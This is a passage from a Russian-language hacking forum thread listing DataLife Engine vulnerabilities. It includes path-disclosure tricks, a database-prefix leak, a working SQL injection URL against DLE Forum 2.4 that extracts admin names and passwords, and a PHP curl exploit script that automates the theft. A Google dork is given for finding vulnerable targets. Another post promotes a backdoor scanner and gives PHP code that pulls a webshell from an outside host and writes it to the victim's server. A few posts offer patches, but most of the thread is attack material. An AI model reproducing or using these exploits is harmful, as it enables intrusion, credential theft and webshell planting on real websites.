[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. zebrum

    zebrum New Member

    Joined:
    27 Dec 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Раскрытие путей dle 8.3 engine/images.php
    dle_skin: ../
    Code:
    if ($_COOKIE['dle_skin']) {
    	if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) {
    		$config['skin'] = $_COOKIE['dle_skin'];
    	}
    }
    Открываем site.ru/engine/images.php?area=short_story&add_id=
    грузим картинку и получаем раскрытые пути)
     
    #101 zebrum, 10 Feb 2010
    Last edited: 11 Feb 2010
    1 person likes this.
  2. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    возми зайди под админом и нажми редактировать новость , и тебя кинет в админку =)
     
  3. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    129
    Likes Received:
    9
    Reputations:
    1
    Уже обговаривали выше это момент. Что там нету этих конопок. и вообщше нету новостей. ДЛЕ передалан в мощный портал.
     
  4. Spamik

    Spamik New Member

    Joined:
    9 Nov 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Да там все 3 файла смотреть можно
     
  5. Foka

    Foka Banned

    Joined:
    13 Feb 2008
    Messages:
    0
    Likes Received:
    43
    Reputations:
    5
    по DLE 8.3 ктото может чтото сказать?
     
  6. necros555

    necros555 New Member

    Joined:
    14 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    engine/inc/include/init.php?selected_language= cрабатывает вот этот експлоит

    Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in S:\home\192.168.2.1\www\engine\inc\include\init.php on line 19

    Fatal error: require_once() [function.require]: Failed opening required 'ENGINE_DIR/inc/include/functions.inc.php' (include_path='.;/usr/local/php5/PEAR') in S:\home\192.168.2.1\www\engine\inc\include\init.php on line 19

    подскажите что можно дальше зделать? и можно ли залить шелл или так слить базу зарние спс
     
  7. cheburator

    cheburator New Member

    Joined:
    16 Apr 2009
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    1. В 8.3 Пофиксили ;
    2. Это раскрытие путей. Может пригодится только если ты зальешь шелл через соседей. Для того что бы найти путь
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Не только. Если помимо DLE на сайте присутствует другой движок, в котором присутствует скуля, то есть вероятность залить шелл через INTO OUTFILE, в чем и поможет раскрытие путей.
     
    1 person likes this.
  9. WEBAdmin

    WEBAdmin New Member

    Joined:
    31 Jul 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Ребят а подскажите как узнать версию Dle ? admin.php не помогло сразу говорю,что там нет ни каких картинок с версией в ней :)
     
  10. adzona

    adzona Elder - Старейшина

    Joined:
    7 Jun 2008
    Messages:
    3
    Likes Received:
    5
    Reputations:
    1
    нужно какую то особую картинку грузить?
     
  11. Dr.Brain

    Dr.Brain Banned

    Joined:
    4 Sep 2009
    Messages:
    6
    Likes Received:
    16
    Reputations:
    0
    Вот софтина сканнер dle сайтов с встроенным бекдором сборки от злого
    Нужна база сайтов которых в паблике навалом..

    Скачать

    В архиве сканнер и кейген для него
    Покупал за 15$ , потому выкласть не жалко...
    На базе 16000 сайтов нашёл 6 бекдоров
    Версия DLE 8.2-8.5
    Сканнер можна настроить под любую ссылку бекдора если надо..

    Скорость: 2-3 сайта в сек. (1мбит)
    Сам бекдор выполняет любой PHP код, потому залить шелл не составит труда

    Берём хостинг. Туда текстовик с шеллом вида shell.txt
    Идём в бекдор. Пишем
    $shell = file_get_contents("http://site/shell.txt");
    $fp = fopen("shell.php", a);
    fwrite($fp, $shell);
    fclose($fp);
     
    #111 Dr.Brain, 15 Mar 2010
    Last edited: 15 Mar 2010
  12. VirGod

    VirGod Member

    Joined:
    28 Aug 2009
    Messages:
    9
    Likes Received:
    10
    Reputations:
    0
    Проблема: Недостаточная фильтрация входящих данных в регистрации.
    Ошибка в версии: все версии
    Степень опасности: Низкая
    Баг нашёл: Lion__

    Баг позволяет узнать префикс к бд.
    Как юзать:
    1) Переходим по ссылке ?do=register
    2) Вводим логин, пароль, капчу, email более 50 символов.
    Пример email:

    qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrftg@qawsedrftg.qawsedrftg



    3) Нажимаем зарегистрироваться
    4) Повторяем операцию с 1 по 3 шаги.
    5) Получаем ошибку о дубликате поля. В ней смотрим префикс к бд.

    Как это работает? Дело в том что поле email стоит ограничение в 50 символов, таким образом остальное всё обрезается, при первой регистрации в бд попало значение:

    qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft



    После второй регистрации идёт поиск поля email со значением:

    qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrftg@qawsedrftg.qawsedrftg



    Которого нет, отправляется запрос, получаем ошибку.

    Исправить:

    Найти в engine/modules/register.php:

    $email = $db->safesql( $parse->process( $_POST['email'] ) );


    Заменить на:

    $email = $db->safesql( $parse->process( substr($_POST['email'], 0,50) ) );


    Источник: _http://forum.seo-king.ru/index.php?showtopic=377




    должно получиться это:

    [​IMG]
     
    1 person likes this.
  13. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    dle forum 2.4 sql inj

    Sql-inj в dle-forum*е 2.4 была найдена мной , ещё месяца 2 назат) решил выложить , т.к. сайтов ещё много дырявых.
    site.ru/?do=forum&showtopic=23%2527+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1--
    юзаем так ...
    Защищаемся:
    открываем файл: engine/forum/sources/components/init.php
    446 строка
    PHP:
    ....
        if (
    $_REQUEST['category'])
        {
            
    $act 'category';
            
            
    $cid =$_REQUEST['category'];
            
            
    $t_act '?c'.$cid;
        }
        if (
    $_REQUEST['showforum'])
        {
            
    $act 'forum';
            
            
    $fid $_REQUEST['showforum'];
            
            
    $t_act '?f'.$fid;
        }
        
        if (
    $_REQUEST['showtopic'])
        {
            
    $act 'topic';
            
            
    $tid $_REQUEST['showtopic'];
            
            
    $t_act '?t'.$tid;
        }
    ......
    заменяем на
    PHP:
    ......
    if (
    $_REQUEST['category'])
        {
            
    $act 'category';
            
            
    $cid intval($_REQUEST['category']);
            
            
    $t_act '?c'.$cid;
        }
        
        if (
    $_REQUEST['showforum'])
        {
            
    $act 'forum';
            
            
    $fid intval($_REQUEST['showforum']);
            
            
    $t_act '?f'.$fid;
        }
        
        if (
    $_REQUEST['showtopic'])
        {
            
    $act 'topic';
            
            
    $tid intval($_REQUEST['showtopic']);
            
            
    $t_act '?t'.$tid;
        }
    .....
    вот типа сплоит писал месяца 2 назат для себя.
    PHP:
    <form method="POST" >
    Введи сайт "например" "<b>alldle.ru</b>" <input type="text" name="site" value="<?=$_POST['site']?>">
    лимит вводить если показало mysql error<input type="text" name="lim" value="<?=$_POST['lim']?>">
    <input type="submit" value="send">
    </form>
    <?php 
    if (!empty($_POST['site'])){
    $lim="1";
    if (!empty(
    $_POST['lim'])){$lim ="{$_POST['lim']},";$lim .=$_POST['lim'];}
    $url='http://'.$_POST['site'].'/?do=forum&showtopic=23%2527+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+'.$lim.'--';
    $ua='Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10';
    $cu=curl_init($url);
    curl_setopt($cu,CURLOPT_HEADER0);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER1); 
    curl_setopt($cu,CURLOPT_FOLLOWLOCATION1);
    curl_setopt($cu,CURLOPT_USERAGENT$ua);
    $log=curl_exec($cu);
    $log=html_entity_decode($log);
    if (
    preg_match_all('#<title>(.*)» (.*)</title>#i',$log,$log2)){
    $ss=$log2[2][0];
    if (!
    preg_match('#[:]#is',$ss,$loggg)){ echo 'нету баги ';exit;}
    $save=explode(':',$ss);
    echo 
    " <b>site:</b> <font color='green'> ".$_POST['site']."</font><br>";
    echo 
    " <b>name:</b> <font color='red'> ".$save[0]."</font><br>";
    echo 
    "<b>pass:</b> <font color='blue'> ".$save[1]."</font><br>";
    }
    else { echo 
    " баги не найдено =( ";preg_match_all('#<title>(.*)</title>#i',$log,$logi); echo "<b>{$logi[1][0]}</b>";}
    curl_close($cu);
    }
    ?>

    (c) dark_cracker
    dork:
    inurl:/forum/ intext:DLE Forum v.2.4 © 2010 Pocketx.Ru
     
    1 person likes this.
  14. Alex$09

    Alex$09 New Member

    Joined:
    1 Oct 2009
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
    http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
     
  15. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    В 8.3, может и раньшых!
    вывод какие модули стоят.

    Файл

    http://localhost/engine/ajax/antivirus.php

    Вывод список!

    Защищаемся
    На начало добавить

    PHP:
    if(!defined('DATALIFEENGINE'))
    {
      die(
    "You lol! Anatole yzhe tut");
    }
     
    #115 sir95, 27 Mar 2010
    Last edited: 27 Mar 2010
  16. saransko_o

    saransko_o New Member

    Joined:
    1 Jan 2009
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    да. нулл от MID.
     
  17. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
    Сам лично юзаю PHP - Fusion.
     
  18. saransko_o

    saransko_o New Member

    Joined:
    1 Jan 2009
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Кстати на многих лицензия была
     
    #118 saransko_o, 12 Apr 2010
    Last edited: 12 Apr 2010
  19. A!m0ff

    A!m0ff New Member

    Joined:
    7 Apr 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    А кто автор и как с ним связаться ?
     
  20. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос, залил шелл.
    А как его юзать? Фиг его знает как искать етот шелл..... ;)
     
Loading...